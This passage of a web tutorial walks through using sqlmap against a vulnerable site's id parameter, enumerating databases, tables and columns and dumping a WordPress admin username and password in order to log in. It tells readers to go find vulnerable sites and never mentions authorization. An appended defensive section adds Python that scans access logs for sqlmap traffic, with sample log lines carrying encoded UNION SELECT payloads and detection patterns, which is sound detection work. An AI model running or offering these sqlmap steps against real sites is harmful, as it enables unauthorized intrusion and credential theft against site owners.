- Statement Injection
- Union Queries
- Illegal/Logically Incorrect Queries
- Stored Procedure Injection
So, how to hack a website with SQLMap?
Before starting, we need a few things.
- Linux OS (I would recommend Kali Linux)
- SQLMap (if it does not come pre-installed with your Linux distribution)
- WordPress Website
Once you have everything required, we can move on to the steps to follow to hack a website with SQLMap.
- First of all, make sure you have a machine with Linux installed and ready to use.
- Open a terminal, type cd /pentest/database/sqlmap and hit Enter. You are now in the sqlmap directory.
- Now find the vulnerable site. You can check out how to find vulnerable websites here. After finding the vulnerable website, type python sqlmap.py -u http://target.com/index.php?id=4 --dbs in the terminal. Make sure to replace the link with your target website.
- As you hit Enter, you will get the database name of the website.
- Now that we know the database, it's time to get the tables from the Information Schema. For that, run the following command.
python sqlmap.py -u http://target.com/index.php?id=4 -D DatabaseName --tables
- In my scenario, the output looks like the screenshot below.
- This will give us a list of all the tables in the target database.
- As you can see, we got all the tables of the target database. Now we need to predict which table is used for users or admins. In most cases, the admin and users tables contain the administrator login info. As you can see, we have a table named admin. Now we will try to get its columns. To get the columns, run the following command.
python sqlmap.py -u http://target.com/index.php?id=4 -T admin --columns
- After hitting Enter, we get columns of the admin table.
- Luckily, here we got username and password columns. Now we try to get the usernames and passwords from the admin table. To do that, simply run the following command.
python sqlmap.py -u http://target.com/index.php?id=4 -T admin -U test --dump
- Wow..!! We got the admin username and password of the WordPress website here.
- Finally, we have username and password. Now just type the target’s admin URL and just use the grabbed username and password to login. WordPress admin panel URL would look like.
That's all..! Hope it will work for you. This is how to hack a website with SQLMap. If you encounter any problem, feel free to comment below.
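Seen from the defender's side, the enumeration steps above leave a clear trail in the web server's access log, because a numeric id parameter suddenly carries SQL text. The following is an added example, not part of the original tutorial: it scans combined-format log lines for that signal. The sample log lines, the `scan` function and its reason labels are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /index.php?id=4 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [10/Mar/2024:10:02:11 +0000] "GET /index.php?id=4%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.7 (https://sqlmap.org)"
203.0.113.9 - - [10/Mar/2024:10:02:15 +0000] "GET /index.php?id=4%20UNION%20ALL%20SELECT%20NULL%2Ctable_name%20FROM%20information_schema.tables HTTP/1.1" 200 7340 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.8 - - [10/Mar/2024:10:03:00 +0000] "GET /index.php?id=17 HTTP/1.1" 200 4988 "-" "Mozilla/5.0 (Windows NT 10.0)"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Keywords typical of the database/table/column enumeration stage.
SCHEMA_RE = re.compile(r"information_schema|union\s+(all\s+)?select", re.I)


def scan(log_text, param="id"):
    """Return (line number, client IP, reasons) for each suspicious request."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        # parse_qs percent-decodes the value, so encoded payloads are visible.
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        values = query.get(param, [])
        reasons = []
        if "sqlmap" in m["ua"].lower():
            reasons.append("sqlmap-user-agent")  # hint only: client-controlled
        if any(not (v.isascii() and v.isdigit()) for v in values):
            reasons.append("non-numeric-id")  # durable signal for an integer id
        if any(SCHEMA_RE.search(v) for v in values):
            reasons.append("schema-enumeration")
        if reasons:
            findings.append((lineno, m["ip"], reasons))
    return findings


if __name__ == "__main__":
    for lineno, ip, reasons in scan(SAMPLE_LOG):
        print(f"line {lineno}: {ip} -> {', '.join(reasons)}")
```

The same "digits only" rule belongs in the application itself: an id that is validated as an integer and passed to a parameterized query gives these requests nothing to inject into.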